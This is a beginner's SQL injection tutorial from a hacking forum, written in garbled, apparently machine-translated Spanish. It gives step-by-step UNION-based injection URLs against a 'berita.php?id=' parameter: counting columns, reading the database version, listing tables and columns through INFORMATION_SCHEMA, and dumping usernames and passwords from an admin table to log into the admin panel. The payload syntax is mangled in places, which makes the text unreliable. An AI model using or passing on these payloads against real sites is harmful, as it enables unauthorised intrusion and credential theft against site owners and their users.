SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

                    ***************************************************************
                   *  SQLI tutorial pour débutants ecrite par *..::Key-m0rt::..*     *         
                   ****************************************************************

bueno aqui les traigo un pequeño tutorial de sqli  para newbies ( principiantes ) espero que les guste no olvien agradecer , es gratis

===========
= Primer  paso: =
===========

Buscar destino
Por ejemplo: [sitio] / berita.php? id = 100

Añadir los personajes al final de la URL, o agregar el carácter "-" (sin las ") para ver si hay un mensaje de error.
ejemplo:

[sitio] / berita.php? id = 100 'o
[sitio] / berita.php? id =- 100

==========
= El segundo paso: =
==========

encontrar y contar el número de tablas disponibles en la base de datos ...
use el comando: Ordenar por:

ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + por +1- - o
[sitio] / berita.php? ID 100 =- + para + de 1 / *

paso a paso (satupersatu) ...
ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + de +1- --
[sitio] / berita.php? ID 100 =- + para + por +2- --
[sitio] / berita.php? ID 100 =- + para + por +3- --
[sitio] / berita.php? ID 100 =- + para + por +4- --

por lo tanto, el error o mensaje de error de ...
Por ejemplo: [sitio] / berita.php? ID 100 =- + para + por +9- --

significa que tomamos es hasta el número 8
se convierte en [sitio] / berita.php? ID 100 =- + para + por +8- --


===========
= El tercer paso: =
===========

para averiguar cómo utilizar la Unión parece
debido a este error hasta el número 9
a continuación: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4,5,6,7,8 seleccione --

ok escribió los números es como el 5

utilizar la versión () o @ @ version para comprobar la versión de diapakai entrada de comandos SQL escribió sobre TSB nagka escribió el último en salir
Por ejemplo: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, version (), 6,7,8 - o
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, @ @ version, 6,7,8 --

Ver la versión utilizada es como YG 4 versiones dejan ver porque en este 4 que teníamos que adivinar su propia columna de la tabla n imaginable en la red porque no pueden usar el comando + De INFORMATION_SCHEMA ..

de la versión 5 significa que tienen la suerte de no tener que adivinar la columna de la tabla n Ver Ver como 4 porque el 5 era capaz de utilizar el comando de + INFORMATION_SCHEMA ..


===========
= cuarto paso : =
===========

para mostrar todo el contenido de la tabla que se está
GROUP_CONCAT comando (TABLE_NAME)>>> incluido en las cifras a la última respuesta
Comando + de + INFORMATION_SCHEMA.TABLES + + = donde table_schema base de datos ()>>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (TABLE_NAME), 6,7,8 + de + en + + INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = base de datos () -- --

=============
= quinto paso : =
=============

GROUP_CONCAT comando (column_name)>>> incluido en las cifras a la última respuesta
Comando + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa ->>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa --

en esta etapa debe mengextrak palabra sobre el contenido de la tabla para convertir hexadecimal de esta manera
YG sitio web se utiliza para la conversión:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ejemplo de palabras de compasión en la conversión de la administración se 61646D696E

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0x61646D696E --

============
= Sexto Paso : =
============

ayer dio lugar a lo que ha sido excluido de la tabla que es la forma

CONCAT_WS comando (0x3a, la columna de contenidos respuesta emitida)>>> incluido en las cifras a la última respuesta
Comando + de + (nombre derivado de la mesa)>>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, el contenido de la columna), 6,7,8 + de + (nombre de la tabla derivados) --

ejemplos de palabras que salió fue el de identificación, nombre de usuario, contraseña

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, id, nombre de usuario, contraseña), 6,7,8 + de + admin --

==============
= Septimo paso : =
==============

etapa final para admin patio o inicio de sesión.

un saludo , agradezcan c'est gratuit   *..:: key-m0rt::..*